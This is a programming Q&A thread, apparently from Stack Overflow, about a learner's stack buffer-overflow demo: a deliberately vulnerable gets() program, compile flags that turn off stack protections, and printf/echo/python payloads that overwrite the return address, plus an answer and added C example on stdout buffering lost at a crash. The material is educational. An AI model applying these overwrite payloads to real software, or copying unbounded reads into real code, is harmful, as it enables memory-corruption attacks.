
I am trying to learn about buffer overflow attacks and wanted to see a working demo of the same. I have been following many online resources to understand the same. For example, this has proven really helpful so far.

I understand the concept of buffer overflow clearly, however, I am unable to get the demo working. I am on a 64-bit Mac, running 32-bit Ubuntu in VirtualBox (the machine where I am experimenting with buffer overflow). I have disabled ASLR on Ubuntu for the sake of playing around with the buffer overflow.

I have a simple C program, demo.c, taken from the video link mentioned above:

#include <stdio.h>

void CanNeverExecute(void)
{
    printf("I can never execute");
}

void GetInput(void)
{
    char buffer[8];
    gets(buffer);   /* the vulnerable function: no bound on the read */
    puts(buffer);
}

int main(void)
{
    GetInput();
    return 0;
}

I have tried all the below variations to compile the program as:

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -o demo demo.c

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -o demo demo.c

gcc -ggdb -fno-stack-protector -mpreferred-stack-boundary=2 -z execstack -m32 -o demo demo.c

The idea is to overwrite the return address on the stack with the address of the CanNeverExecute() by exploiting the gets(). The address of CanNeverExecute turns out to be 0x0804847b.

To do so, I have tried the following:

printf "123456789abc\x7b\x84\x04\x08" | ./demo

echo -e "123456789abc\x7b\x84\x04\x08" | ./demo

python -c 'print "a"*12 + "\x7b\x84\x04\x08"' | ./demo

where 12345678 is to fill up the buffer space, 9abc is to overwrite the value of ebp stored on the stack and finally the return address stored on the stack is overwritten with the address of CanNeverExecute().

Ideally, what I expect (as also shown in the demo link above) is the CanNeverBeExecuted() getting executed and the message in it being printed.

But contrary to the expectation, in all of the above cases, I get a "segmentation fault (core dumped)" with the following printed on the terminal:

123456789abc{,,[some_unprintable_character]

The CanNeverBeExecuted() does not get executed.

What am I missing? What needs to be changed? Please help.

  • main calls getInput but the function seems to be named GetInput. What is the code you're actually compiling? Commented Jan 14, 2016 at 22:16

1 Answer


Your "CanNeverExecute" function is executing, but you're not seeing its output. Change it to:

void CanNeverExecute(void)
{
    printf("I can never execute\n");
    fflush(stdout);   /* force the buffered text out before the crash */
}

The problem is that the program crashes before the output buffer is flushed.


3 Comments

Adding a newline character will flush stdout anyway.
Oleg: I think that is true if stdout is writing to a terminal, but not if it is writing to a device/file that isn't interactive
Awesome. I have had this experience with C earlier, when I used to code in C. It had faded somewhere in my memories. Thanks a ton guys.
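The following is an added example, not code from the question, the answer, or the linked video, that makes the answer's point and the comment thread's caveat observable. It forks a child whose stdout is a pipe (so it is fully buffered, like a redirected or piped demo), has the child print the same text without a newline, then kills it with SIGSEGV with or without an fflush() first, and counts how many bytes the parent actually receives. The names MESSAGE and bytes_delivered_before_crash are mine; the example assumes a POSIX system with fork() and pipe().

```c
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Same text the demo prints, deliberately without a trailing newline. */
static const char MESSAGE[] = "I can never execute";
#define MESSAGE_LEN ((long)sizeof(MESSAGE) - 1)

/*
 * Fork a child whose stdout is a pipe back to us.  The child prints MESSAGE,
 * optionally flushes, and then dies from SIGSEGV, which is how the demo ends
 * once the overwritten return address is used.  A process killed by a signal
 * never runs the exit-time stdio flush, so whatever printf() left in the
 * user-space buffer is lost.  Returns the number of bytes the parent actually
 * received, or -1 if the pipe/fork setup failed.
 */
long bytes_delivered_before_crash(int flush_before_crash)
{
    int fds[2];
    fflush(stdout);               /* don't let the child inherit pending output */
    if (pipe(fds) != 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {
        /* child: route stdout into the pipe */
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        close(fds[1]);

        printf("%s", MESSAGE);    /* lands in the stdio buffer, not in the pipe */
        if (flush_before_crash)
            fflush(stdout);       /* push the buffer to the kernel now */

        signal(SIGSEGV, SIG_DFL);
        raise(SIGSEGV);           /* simulate the crash; no buffers are flushed */
        _exit(127);               /* not reached */
    }

    /* parent: count whatever arrives until the child's end of the pipe closes */
    close(fds[1]);
    long total = 0;
    char buf[256];
    ssize_t n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0)
        total += n;
    close(fds[0]);

    int status;
    waitpid(pid, &status, 0);
    return total;
}

int main(void)
{
    long lost = bytes_delivered_before_crash(0);
    long kept = bytes_delivered_before_crash(1);
    printf("without fflush: %ld of %ld bytes reached the reader\n", lost, MESSAGE_LEN);
    printf("with fflush:    %ld of %ld bytes reached the reader\n", kept, MESSAGE_LEN);
    return 0;
}
```

Without the flush the reader sees 0 bytes; with it, all 19. This is also why the comment thread is right on both sides: when stdout is an interactive terminal the stream is line-buffered and a trailing '\n' alone would have emptied the buffer, but a pipe or file is fully buffered, so only fflush() (or an orderly exit) gets the text out before the crash.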
